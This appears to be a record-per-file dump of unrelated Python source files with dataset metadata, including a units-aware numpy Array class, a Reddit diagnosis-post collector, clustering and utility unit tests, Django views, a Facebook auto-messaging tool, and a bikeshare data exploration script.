\".format(self._unit.units)\n shape_str = str(self._array.shape)\n return name_str + values_str + unit_str + shape_str\n\n def __repr__(self):\n return str(self)\n\n def copy(self):\n return self.__class__(values=self._array.copy(),\n unit=self._unit.copy(),\n name=self._name)\n\n @property\n def values(self):\n return self._array\n\n @values.setter\n def values(self, values_):\n self._array = values_\n\n @property\n def array(self):\n return self._array\n\n @array.setter\n def array(self, array_):\n self._array = array_\n\n @property\n def norm(self):\n if self._array.ndim < 2:\n return self\n else:\n return self.__class__(values=np.linalg.norm(self._array, axis=1),\n unit=self.unit)\n\n 
@property\n def unit(self):\n return self._unit\n\n @unit.setter\n def unit(self, unit_):\n self._unit = unit_\n\n @property\n def ndim(self):\n if self._array.shape:\n return self._array.shape[-1]\n return 0\n\n @property\n def shape(self):\n return self._array.shape\n\n @property\n def parent(self):\n return self._parent\n\n @parent.setter\n def parent(self, parent_):\n self._parent = parent_\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, name_):\n self._name = name_\n\n @property\n def x(self):\n if self.ndim > 1:\n return self.__class__(values=self._array[:, 0],\n unit=self._unit,\n parent=self._parent,\n name=self._name + \"_x\")\n\n @property\n def y(self):\n if self.ndim > 1:\n return self.__class__(values=self._array[:, 1],\n unit=self._unit,\n parent=self._parent,\n name=self._name + \"_y\")\n\n @property\n def z(self):\n if self.ndim > 2:\n return self.__class__(values=self._array[:, 2],\n unit=self._unit,\n parent=self._parent,\n name=self._name + \"_z\")\n\n @property\n def label(self):\n return make_label(name=self._name, unit=self._unit.units)\n\n def _broadcast(self, lhs, rhs):\n if (lhs.ndim == rhs.ndim) or (len(lhs.shape) == 0) or (len(rhs.shape) == 0):\n return lhs, rhs\n if lhs.ndim > rhs.ndim:\n ind = np.argmax(np.array(lhs.shape) == rhs.shape[0])\n if ind == 0:\n return lhs, rhs.reshape(rhs.shape + tuple([1]))\n else:\n return lhs, rhs.reshape(tuple([1]) + rhs.shape)\n else:\n ind = np.argmax(np.array(rhs.shape) == lhs.shape[0])\n if ind == 0:\n return lhs.reshape(lhs.shape + tuple([1])), rhs\n else:\n return lhs.reshape(tuple([1]) + lhs.shape), rhs\n\n def _raise_incompatible_units_error(self, other, op):\n raise TypeError(\"Could not {} types {} and {}.\".format(op, self, other))\n\n def __add__(self, other):\n if isinstance(other, self.__class__):\n scale_r = other.unit.to(self._unit.units)\n lhs = self._array\n rhs = other._array * scale_r.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs + rhs, unit=self._unit)\n if isinstance(other, Quantity):\n return self.__class__(values=self._array +\n other.to(self._unit.units).magnitude,\n unit=self._unit)\n self._raise_incompatible_units_error(other, \"add\")\n\n def __iadd__(self, other):\n if isinstance(other, self.__class__):\n scale_r = other.unit.to(self._unit.units)\n rhs = other._array * scale_r.magnitude\n self._array += rhs\n elif isinstance(other, Quantity):\n self._array += other.to(self._unit.units).magnitude\n else:\n self._raise_incompatible_units_error(other, \"add\")\n return self\n\n def __sub__(self, other):\n if isinstance(other, self.__class__):\n scale_r = other.unit.to(self._unit.units)\n lhs = self._array\n rhs = other._array * scale_r.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs - rhs, unit=self._unit)\n if isinstance(other, Quantity):\n return self.__class__(values=self._array -\n other.to(self._unit.units).magnitude,\n unit=self._unit)\n self._raise_incompatible_units_error(other, \"subtract\")\n\n def __isub__(self, other):\n if isinstance(other, self.__class__):\n scale_r = other.unit.to(self._unit.units)\n rhs = other._array * scale_r.magnitude\n self._array -= rhs\n elif isinstance(other, Quantity):\n self._array -= other.to(self._unit.units).magnitude\n else:\n self._raise_incompatible_units_error(other, \"subtract\")\n return self\n\n def __mul__(self, other):\n if isinstance(other, self.__class__):\n scale_l = self._unit.to_base_units()\n scale_r = other._unit.to_base_units()\n 
result = scale_l * scale_r\n lhs = self._array\n rhs = other._array * result.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs * rhs, unit=1.0 * result.units)\n if isinstance(other, Quantity):\n scale_l = self._unit.to_base_units()\n scale_r = other.to_base_units()\n result = scale_l * scale_r\n return self.__class__(values=self._array * result.magnitude,\n unit=1.0 * result.units)\n return self.__class__(values=self._array * other, unit=self._unit)\n\n def __imul__(self, other):\n if isinstance(other, self.__class__):\n scale_l = self._unit.to_base_units()\n scale_r = other._unit.to_base_units()\n result = scale_l * scale_r\n rhs = other._array * result.magnitude\n self._array *= rhs\n self._unit = 1.0 * result.units\n elif isinstance(other, Quantity):\n scale_l = self._unit.to_base_units()\n scale_r = other.to_base_units()\n result = scale_l * scale_r\n self._array *= result.magnitude\n self._unit = 1.0 * result.units\n else:\n self._array *= other\n return self\n\n def __truediv__(self, other):\n if isinstance(other, self.__class__):\n scale_l = self._unit.to_base_units()\n scale_r = other._unit.to_base_units()\n result = scale_l / scale_r\n lhs = self._array\n rhs = other._array / result.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs / rhs, unit=1.0 * result.units)\n if isinstance(other, Quantity):\n scale_l = self._unit.to_base_units()\n scale_r = other.to_base_units()\n result = scale_l / scale_r\n return self.__class__(values=self._array * result.magnitude,\n unit=1.0 * result.units)\n return self.__class__(values=self._array / other, unit=self._unit)\n\n def __itruediv__(self, other):\n if isinstance(other, self.__class__):\n scale_l = self._unit.to_base_units()\n scale_r = other._unit.to_base_units()\n result = scale_l / scale_r\n rhs = other._array / result.magnitude\n self._array /= rhs\n self._unit = 1.0 * result.units\n elif isinstance(other, Quantity):\n scale_l = self._unit.to_base_units()\n scale_r = other.to_base_units()\n result = scale_l / scale_r\n self._array *= result.magnitude\n self._unit = 1.0 * result.units\n else:\n self._array /= other\n return self\n\n def __rmul__(self, other):\n return self * other\n\n def __rtruediv__(self, other):\n if isinstance(other, self.__class__):\n scale_r = self._unit.to_base_units()\n scale_l = other._unit.to_base_units()\n result = scale_l / scale_r\n lhs = self._array\n rhs = other._array / result.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs / rhs, unit=1.0 * result.units)\n if isinstance(other, Quantity):\n scale_r = self._unit.to_base_units()\n scale_l = other.to_base_units()\n result = scale_l / scale_r\n return self.__class__(values=self._array * result.magnitude,\n unit=1.0 * result.units)\n return self.__class__(values=other / self._array, unit=1.0 / self._unit)\n\n def __pow__(self, number):\n return np.power(self, number)\n\n def __lt__(self, other):\n return _comparison_operator(self, other, \"less\")\n\n def __le__(self, other):\n return _comparison_operator(self, other, \"less_equal\")\n\n def __gt__(self, other):\n return _comparison_operator(self, other, \"greater\")\n\n def __ge__(self, other):\n return _comparison_operator(self, other, \"greater_equal\")\n\n def __eq__(self, other):\n return _comparison_operator(self, other, \"equal\")\n\n def __ne__(self, other):\n return _comparison_operator(self, other, \"not_equal\")\n\n def to(self, unit):\n if isinstance(unit, str):\n new_unit = units(unit)\n else:\n 
new_unit = unit\n ratio = self._unit.to(new_unit) / new_unit\n self._unit = 1.0 * new_unit\n self._array *= ratio.magnitude\n return self\n\n def _wrap_numpy(self, func, *args, **kwargs):\n if func.__name__ in self.special_functions:\n unit = func(self.unit, *args[1:], **kwargs)\n else:\n unit = self.unit\n if isinstance(args[0], tuple) or isinstance(args[0], list):\n # Case where we have a sequence of arrays, e.g. `concatenate`\n for a in args[0]:\n if a.unit != unit:\n self._raise_incompatible_units_error(a, func.__name__)\n args = (tuple(a._array for a in args[0]), ) + args[1:]\n elif (len(args) > 1 and hasattr(args[1], \"_array\")):\n if hasattr(args[0], \"_array\"):\n # Case of a binary operation, with two Arrays, e.g. `dot`\n # TODO: what should we do with the unit? Apply the func to it?\n unit = func(args[0].unit, args[1].unit, *args[2:], **kwargs)\n args = (args[0]._array, args[1]._array) + args[2:]\n else:\n # Case of a binary operation: ndarray with Array\n # In this case, only multiply is allowed?\n if func.__name__ != \"multiply\":\n raise RuntimeError(\"Cannot use operation {} between ndarray and \"\n \"Array\".format(func.__name__))\n args = (args[0], args[1]._array) + args[2:]\n else:\n args = (args[0]._array, ) + args[1:]\n result = func(*args, **kwargs)\n return self.__class__(values=result, unit=unit)\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):\n \"\"\"\n Numpy array_ufunc protocol to allow Array to work with numpy ufuncs.\n \"\"\"\n if method != \"__call__\":\n # Only handle ufuncs as callables\n return NotImplemented\n return self._wrap_numpy(ufunc, *inputs, **kwargs)\n\n def __array_function__(self, func, types, args, kwargs):\n \"\"\"\n Numpy array_function protocol to allow Array to work with numpy\n functions.\n \"\"\"\n return self._wrap_numpy(func, *args, **kwargs)\n\n def min(self):\n return self.__class__(values=self._array.min(), unit=self._unit)\n\n def max(self):\n return self.__class__(values=self._array.max(), unit=self._unit)\n\n def reshape(self, *shape):\n return self.__class__(values=self._array.reshape(*shape), unit=self._unit)\n","sub_path":"src/osyris/core/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":14480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356822365","text":"import json\n\ndef isPostDiagnosisPositive(post, positive_triggers):\n for trigger in positive_triggers:\n if 'selftext' in post and trigger in post['selftext'].lower():\n return (True, trigger)\n \n elif 'title' in post and trigger in post['title'].lower():\n return (True, trigger) \n \n return (False, None)\n\ndef identifyDiagnosesPosts(posts):\n with open('files/diagnospatterns_positive.txt') as f:\n positive_triggers = [x[:len(x)-1] for x in f.readlines()]\n\n pos_diagnosis_posts = []\n for _, post in enumerate(posts['data']): \n # print(i) if i % 10 == 0 else None\n pos_diagnos, _ = isPostDiagnosisPositive(post, positive_triggers)\n if pos_diagnos:\n pos_diagnosis_posts.append(post)\n\n return pos_diagnosis_posts\n\ndef main():\n depression_set = []\n while len(depression_set) < 100000:\n \n # get a new batch of posts and pull out those with positive diagnoses\n posts = data_collection.getPosts(subreddit='depression', limit=1000)\n pos_diagnos_posts = identifyDiagnosesPosts(posts)\n depression_set += pos_diagnos_posts\n print(len(depression_set))\n\n # update dataset file \n with open('datasets/extended-100k/id-depression.json', 'w') as f:\n outset = {}\n outset['data'] = 
depression_set\n json.dump(outset, f)\n\n \n \n \n\nif __name__ == '__main__':\n main()","sub_path":"functions/diagnosis_analysis.py","file_name":"diagnosis_analysis.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"421748810","text":"from collections import Counter\n\ngroups = []\n\n# read input data\nwith open(\"input.txt\", \"r\") as data:\n for group in data.read().strip().split(\"\\n\\n\"):\n members_cnt = group.count(\"\\n\") + 1\n yes_counter = Counter(group.replace(\"\\n\", \"\"))\n\n groups.append(len([1 for c in yes_counter if yes_counter[c] == members_cnt]))\n\nprint(f\"Sum of questions that everyone answered YES to: {sum(groups)}\")\n","sub_path":"day_06/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"283001247","text":"import unittest\nimport numpy as np\nimport flask\nimport json\nfrom panoptes_aggregation import reducers\n\n\nclass TestProcessData(unittest.TestCase):\n def setUp(self):\n self.extracted_data = [\n {\n 'T0_tool1_x': [1, 4],\n 'T0_tool1_y': [2, 7],\n 'T0_tool2_x': [3],\n 'T0_tool2_y': [4]\n },\n {\n 'T0_tool1_x': [1],\n 'T0_tool1_y': [2]\n }\n ]\n\n def test_process_data(self):\n expected_result = {\n 'T0_tool1': [(1, 2), (4, 7), (1, 2)],\n 'T0_tool2': [(3, 4)]\n }\n self.assertDictEqual(reducers.cluster_points.process_data(self.extracted_data), expected_result)\n\n\nclass TestClusterPoints(unittest.TestCase):\n def setUp(self):\n c0_cov = np.array([[3, 0.5], [0.5, 4]])\n c1_cov = np.array([[7, -0.5], [-0.5, 5]])\n c0_loc = np.array([12, 15])\n c1_loc = np.array([20, 25])\n c0_count = 15\n c1_count = 8\n np.random.seed(5000)\n self.data_by_tool = {\n 'tool1': np.vstack([\n np.random.multivariate_normal(c0_loc, c0_cov, size=c0_count),\n np.random.multivariate_normal(c1_loc, c1_cov, size=c1_count)\n ])\n }\n self.result = reducers.cluster_points.cluster_points(self.data_by_tool, eps=5, min_samples=3)\n self.expected = {\n 'tool1_points_x': list(self.data_by_tool['tool1'][:, 0]),\n 'tool1_points_y': list(self.data_by_tool['tool1'][:, 1]),\n 'tool1_cluster_labels': [0] * c0_count + [1] * c1_count,\n 'tool1_clusters_count': [c0_count, c1_count],\n 'tool1_clusters_x': [c0_loc[0], c1_loc[0]],\n 'tool1_clusters_y': [c0_loc[1], c1_loc[1]],\n 'tool1_clusters_var_x': [c0_cov[0, 0], c1_cov[0, 0]],\n 'tool1_clusters_var_y': [c0_cov[1, 1], c1_cov[1, 1]],\n 'tool1_clusters_var_x_y': [c0_cov[0, 1], c1_cov[0, 1]],\n }\n\n def test_keys(self):\n for i in self.expected.keys():\n with self.subTest(i=i):\n self.assertIn(i, self.result)\n\n def test_cluster_values(self):\n for i in self.result.keys():\n with self.subTest(i=i):\n np.testing.assert_allclose(self.result[i], self.expected[i], atol=2)\n\n def test_type(self):\n for i in self.result.values():\n with self.subTest(i=i):\n self.assertIsInstance(i, list)\n\n\nclass TestReducerRequest(unittest.TestCase):\n def setUp(self):\n self.app = flask.Flask(__name__)\n request_data = json.dumps([\n {'data': {\n 'T0_tool1_x': [1, 4],\n 'T0_tool1_y': [2, 7],\n 'T0_tool2_x': [3],\n 'T0_tool2_y': [4]\n }},\n {'data': {\n 'T0_tool1_x': [1],\n 'T0_tool1_y': [2]\n }}\n ])\n self.request_kwargs = {\n 'data': request_data,\n 'content_type': 'application/json'\n }\n\n def test_process_request(self):\n expected = {\n 'T0_tool1_points_x': [1, 4, 1],\n 'T0_tool1_points_y': [2, 7, 2],\n 'T0_tool1_cluster_labels': [-1, -1, 
-1],\n 'T0_tool2_points_x': [3],\n 'T0_tool2_points_y': [4],\n 'T0_tool2_cluster_labels': [-1]\n }\n with self.app.test_request_context('/?eps=2', **self.request_kwargs):\n self.assertDictEqual(reducers.cluster_points.point_reducer_request(flask.request), expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"panoptes_aggregation/tests/reducer_tests/test_cluster_points.py","file_name":"test_cluster_points.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199872579","text":"from django.shortcuts import render, redirect\nfrom django.http import Http404\nfrom .models import Remainder\n\n\ndef index(request):\n #Queryset \n # SELEC * FROM Remainder\n remainders = Remainder.objects.all()\n print(remainders)\n return render(request,\"landing/index.html\",{\"recordatorios\":remainders})\n\n\ndef agregar(request):\n \n if request.method == 'POST':\n remainder = Remainder()\n remainder.titulo = request.POST['titulo']\n remainder.descripcion = request.POST['descripcion']\n remainder.prioridad = request.POST['prioridad']\n remainder.save()\n return redirect('landing:index')\n else:\n return render(request,\"landing/agregar.html\")\n\n\ndef detalle(request, pk):\n try:\n #SELECT * FROM Remainder WHERE id = pk\n remainder = Remainder.objects.get(id=pk)\n except:\n raise Http404\n \n return render(request,'landing/detalle.html',\n {\"recordatorio\":remainder})\n\n\ndef some(request):\n return render(request, 'some.html')\n\n\n\n\n\n\n\n\n\n\n\n\n ","sub_path":"landing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"509909694","text":"#!/usr/bin/env python2.3\n# -*- coding: utf-8 -*-\n#\n# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)\n#\n# (1) Kamaelia Contributors are listed in the AUTHORS file and at\n# http://www.kamaelia.org/AUTHORS - please extend this file,\n# not this notice.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# -------------------------------------------------------------------------\n#\n# Full coverage testing of the NullPayloadRTP module.\n#\n\n# Test the module loads\nimport unittest\nimport sys ; sys.path.append(\"..\")\nimport Kamaelia.Util.Console\n\nclass ConsoleEcho_Test(unittest.TestCase):\n def test_init_minArgs(self):\n \"\"\"Smoke test with minimal arguments\"\"\"\n P = Kamaelia.Util.Console.ConsoleEchoer()\n self.assertEqual(P.__class__, Kamaelia.Util.Console.ConsoleEchoer, \"Correctly initialised value created\")\n self.assertTrue(not P.forwarder, \"This is not a forwarder\")\n self.assertTrue(P.init)\n\n def test_init_forwarder(self):\n \"\"\"Smoke test creating a forwarder\"\"\"\n P = Kamaelia.Util.Console.ConsoleEchoer(forwarder=True)\n self.assertEqual(P.__class__, Kamaelia.Util.Console.ConsoleEchoer, \"Correctly initialised value created\")\n self.assertTrue(P.forwarder, \"This is a 
forwarder\")\n self.assertTrue(P.init)\n\nif __name__==\"__main__\":\n unittest.main()\n","sub_path":"Test/test_ConsoleEcho.py","file_name":"test_ConsoleEcho.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"31491342","text":"from yaml import load, dump, YAMLError\nfrom mercurius.time import is_expired\nfrom mercurius.facebook import Facebook, COOKIES\nimport os\nimport random\n\nTEMPLATE = \"{0:25} {1:15} {2:10} {3:20} {4:15} {5:10} {6:1}\"\nFIELDS = TEMPLATE.format(\"FULLNAME\", \"CATEGORY\", \"FREQ.\", \"LAST MESSAGE\", \"ID\",\n \"REF.\", \"\")\n\n\ndef save(f):\n def dec(self, *args, **kwargs):\n f(self, *args, **kwargs)\n self.save_config()\n return dec\n\n\nclass Mercurius:\n def __init__(self, path):\n self.config_path = path\n\n def parse_config(self):\n try:\n with open(self.config_path, 'r') as f:\n self.c = load(f)\n self.messages = self.c[\"messages\"]\n self.friends = self.c[\"friends\"]\n self.cookies = self.c[\"cookies\"]\n # TODO: Write tests on invalid mercurius files\n # if not isinstance(self.c, dict)\n # or not \"friends\" in self.c.keys()\n # or not \"messages\" in c.keys():\n except YAMLError as e:\n print(\"[✖]'{1}': YAML parsing error: {0}\".format(e, path))\n except IOError as e:\n print(\"[✖]'{1}': {0}\".format(e.strerror, path))\n\n def save_config(self):\n try:\n with open(self.config_path, 'w') as f:\n f.write(dump(self.c, default_flow_style=False))\n except YAMLError as e:\n print(\"[✖]'{1}': YAML parsing error: {0}\".format(e, path))\n except IOError as e:\n print(\"[✖]'{1}': {0}\".format(e.strerror, path))\n\n @save\n def reset_config(self):\n self.c = {\"cookies\": 1, \"friends\": {}, \"messages\": {\"default\": []}}\n if os.path.exists(COOKIES):\n os.remove(COOKIES)\n print(\"[✓]Mercurius has been reset.\")\n\n @save\n def add_category(self, cat):\n if cat in self.messages.keys():\n print(\"[✖]Category '{}' already exists.\".format(cat))\n else:\n self.messages[cat] = []\n print(\"[✓]Category '{}' added.\".format(cat))\n\n @save\n def add_message(self, msg, cat):\n if cat in self.messages.keys():\n self.messages[cat].append(msg)\n print(\"[✓]'{}' added to category '{}'.\".format(msg, cat))\n else:\n print(\"[✖]Category '{}' does not exist.\".format(cat))\n\n @save\n def add_friend(self, name, freq, cat):\n if cat not in self.messages.keys():\n print(\"[✖]Category '{}' does not exist.\".format(cat))\n elif len(self.friends) > 0 and name in self.friends.keys():\n print(\"[✖]Friend '{}' already exists.\".format(name))\n else:\n f = Facebook(cookies_enabled=self.cookies)\n self.friends[name] = {\"frequency\": freq, \"category\": cat}\n self.friends[name][\"id\"], self.friends[name][\"fullname\"] = \\\n f.get_user_id_fullname(name)\n if self.friends[name][\"id\"] is None or \\\n self.friends[name][\"fullname\"] is None:\n print(\"[✖]No friend found for '{}'.\".format(name))\n del self.friends[name]\n return\n print(\"[✓]Friend '{}' added to '{}'.\".format(name, cat))\n\n def show_categories(self):\n for cat in sorted(self.messages):\n print(\"{} => {}\".format(cat.upper(),\n ' _ '.join([f for f in self.friends\n if self.friends[f][\"category\"] == cat])\n ))\n if len(self.messages[cat]) > 0:\n i = 1\n for msg in self.messages[cat]:\n print(\"({}) '{}'\".format(i, msg))\n i += 1\n else:\n print(\"No messages.\")\n\n def show_friends(self):\n if len(self.friends) == 0:\n print(\"No Friends.\")\n return\n f = Facebook(cookies_enabled=self.cookies)\n print(FIELDS)\n 
for name, friend in sorted(self.friends.items()):\n date = f.get_last_message_date(friend[\"id\"])\n indicator = '✖' if is_expired(date, friend[\"frequency\"]) else '✓'\n print(TEMPLATE.format(friend[\"fullname\"], friend[\"category\"],\n friend[\"frequency\"], date, friend[\"id\"],\n name, indicator))\n\n @save\n def remove_category(self, cat):\n if cat not in self.messages.keys():\n print(\"[✖]Category '{}' does not exist.\".format(cat))\n elif any(self.friends[friend][\"category\"] == cat\n for friend in self.friends):\n print(\"[✖]Category '{}' contains some friends.\".format(cat))\n elif len(self.messages) < 2:\n print(\"[✖]Can't remove the last category.\")\n else:\n del self.messages[cat]\n print(\"[✓]Category '{}' removed.\".format(cat))\n\n @save\n def remove_message(self, cat, n):\n try:\n del self.messages[cat][n - 1]\n print(\"[✓]Message removed from '{}'.\".format(cat))\n except IndexError:\n print(\"[✖]ID '{}' does not match any message in category '{}'\"\n .format(n, cat))\n\n @save\n def remove_friend(self, name):\n try:\n del self.friends[name]\n print(\"[✓]Friend '{}' removed.\".format(name))\n except KeyError:\n print(\"[✖]Friend '{}' does not exist.\".format(name))\n\n @save\n def change_cookies_setting(self, value):\n self.c[\"cookies\"] = value\n print(\"[✓]Cookies setting set to {}.\".format(value))\n\n def send(self):\n if len(self.friends) == 0:\n print(\"No Friends.\")\n return\n f = Facebook(cookies_enabled=self.cookies)\n recipients = []\n for name, friend in sorted(self.friends.items()):\n date = f.get_last_message_date(friend[\"id\"])\n if is_expired(date, friend[\"frequency\"]):\n cat = friend[\"category\"]\n if len(self.messages[cat]) > 0:\n f.send_message(random.choice(self.messages[cat]),\n friend[\"id\"])\n recipients.append(name)\n else:\n print(\"[✖]No messages in category '{}'.\".format(cat))\n break\n else:\n if len(recipients) > 0:\n print(\"[✓]A message has been sent to: {}.\".format(', '.join(recipients)))\n else:\n print(\"[✓]You're up-to-date.\")\n","sub_path":"mercurius/mercurius.py","file_name":"mercurius.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"623626560","text":"import math\nclass Circulo:\n def __init__(self, pc, r):\n self.pc=pc\n self.r=float(r)\n def contem(self, p):\n self.p=p\n distancia = ((self.pc.x-self.p.x)**2 +(self.pc.y - self.p.y)**2)**0.5\n if distancia < self.r:\n return True\n else:\n return False","sub_path":"backup/user_006/ch89_2020_05_07_21_54_04_734734.py","file_name":"ch89_2020_05_07_21_54_04_734734.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"511131718","text":"import numpy as np\nfrom numpy.testing import assert_array_equal\nfrom nose.tools import assert_equal\n\nfrom pystruct.utils import compress_sym, expand_sym\n\n\ndef test_symmetric_tools_symmetric():\n rnd = np.random.RandomState(0)\n # generate random symmetric matrix\n for size in [4, 6, 11]:\n x = rnd.normal(size=(size, size))\n x = x + x.T\n\n compressed = compress_sym(x, make_symmetric=False)\n assert_equal(compressed.shape, (size * (size + 1) / 2, ))\n\n uncompressed = expand_sym(compressed)\n assert_array_equal(x, uncompressed)\n\n\ndef test_symmetric_tools_upper():\n rnd = np.random.RandomState(0)\n # generate random matrix with only upper triangle.\n # expected result is full symmetric matrix\n for size in [4, 6, 11]:\n x = 
rnd.normal(size=(size, size))\n x = x + x.T\n x_ = x.copy()\n x[np.tri(size, k=-1, dtype=np.bool)] = 0\n\n compressed = compress_sym(x, make_symmetric=True)\n assert_equal(compressed.shape, (size * (size + 1) / 2, ))\n\n uncompressed = expand_sym(compressed)\n assert_array_equal(x_, uncompressed)\n","sub_path":"pystruct/tests/test_utils/test_utils_inference.py","file_name":"test_utils_inference.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"517040038","text":"# External sources used\n# --> https://pandas.pydata.org/pandas-docs/stable/reference/frame.html\n# --> http://unicode.org/emoji/charts/emoji-list.html#1f92d \n# --> https://www.geeksforgeeks.org/python-program-to-print-emojis/\nimport time\nimport numpy as np\nimport pandas as pd\ndef get_filters(): \n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Input: Function takes nothing and returns a tuple.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n\n # Asks the user to enter the name of city for which they want to explore the data.\n # A while loop is used to make sure that the cityname entered is correct and if not,user is asked again to enter the correct city name.\n # An emoji is also used source for which is provided at top.\n city_name = input('Enter the city name to start exploring(CHICAGO / WASHINGTON / NEW YORK CITY) : ')\n while city_name.lower() not in ('chicago','washington','new york city'):\n city_name = input('OOPS..!!\\U0001F605 Please type CITY NAME from (CHICAGO / WASHINGTON / NEW YORK CITY)..!! Lets start again.')\n\n # Asks the user to enter the month of year for which they want to explore the data.\n # A while loop is used to make sure that the month name entered is correct and if not,user is asked again to enter the correct month name. \n month_name = input('looking for a particular month or for all months,type(\\'all\\') ? Enter the name of month or type \\'all\\' for no filter(in words) : ')\n while month_name.lower() not in ('january', 'february', 'march', 'april', 'may', 'june', 'all'):\n month_name = input('OOPS..!!\\U0001F605 Please type correct MONTH NAME..!! Enter again.')\n \n # Asks the user to enter the month of year for which they want to explore the data.\n # A while loop is used to make sure that the month name entered is correct and if not,user is asked again to enter the correct month name. \n day = input('For a particular day or all days(\\'all\\' for all days) ? Enter response(in words) : ')\n while day.lower() not in ('sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'all'):\n day = input('OOPS..!!\\U0001F605 Please enter correct DAY (eg. \\'sunday\\'). 
Enter again.')\n print('\\n'*2)\n\n # Function returns the tuple of strings.\n return city_name.lower(),month_name.lower(),day.lower()\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # Converting the name of month to respective integer representation.\n date = {'januray':1,'february':2,'march':3,'april':4,'may':5,'june':6}\n for key,value in date.items():\n if key == month.lower():\n req_month = value\n\n # Reads the csv file for city entered by user and creates a DataFrame.\n file = pd.read_csv(city.replace(' ','_').lower() + '.csv')\n \n # Replacing the Null values with zeros in the DataFrame\n file = file.fillna(0)\n\n # Converting Start time to datetime format and creating additional columns to apply filter to the DataFrame.\n file['Start Time'] = pd.to_datetime(file['Start Time'])\n file['Week_day'] = file['Start Time'].dt.weekday_name\n file['Month'] = file['Start Time'].dt.month\n file['Hours'] = file['Start Time'].dt.hour\n\n # Filtering the data from DataFrame.\n if month != 'all':\n file = file[file['Month'] == req_month] \n if day != 'all':\n file = file[file['Week_day'] == day.title()]\n\n # Filtered DataFrame is returned.\n return file\n\ndef time_stats(df,month,day):\n \"\"\" Displays statistics on the most frequent times of travel.\"\"\"\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n \n # Marking time as start time in order to calculate the time taken by function to execute.\n start_time = time.time()\n\n # Checks if the the filter is applied for month or not.If yes,the function doesnt print the most popular month.\n if month == 'all':\n\n # Counts the number of times an unique value appears in the 'Month' column and picks up the maximum of those.\n most_pop_month_count = df['Month'].value_counts().max() \n\n # Picks up the value which appears most frequently in the 'Month' column.\n most_pop_month = df['Month'].mode()[0]\n\n # Converting the integer representation of month to respective name of month\n date = np.array(['Januray','February','March','April','May','June'])\n most_pop_month_new = date[most_pop_month-1]\n print('Most popular month :',most_pop_month_new,'\\tcount :',most_pop_month_count)\n\n # Checks if the the filter is applied for day of week or not.If yes,the function doesnt print the most popular day of week.\n if day == 'all':\n\n # Counts the number of times an unique value appears in the 'Week_day' column and picks up the maximum of those.\n most_pop_weekday_count = df['Week_day'].value_counts().max()\n \n # Picks up the value which appears most frequently in the 'Week_day' column.\n most_pop_weekday = df['Week_day'].mode()[0]\n print('Most popular weekday :',most_pop_weekday,'\\tcount :',most_pop_weekday_count)\n \n # Counts the number of times an unique value appears in the 'Hours' column and picks up the maximum of those.\n most_pop_hour_count = df['Hours'].value_counts().max()\n \n # Picks up the value which appears most frequently in the 'Hours' column.\n most_pop_hour = df['Hours'].mode()[0]\n print('Most popular hour :',most_pop_hour,'\\tcount :',most_pop_hour_count)\n\n # Marking the time as end time for calculation of time taken for 
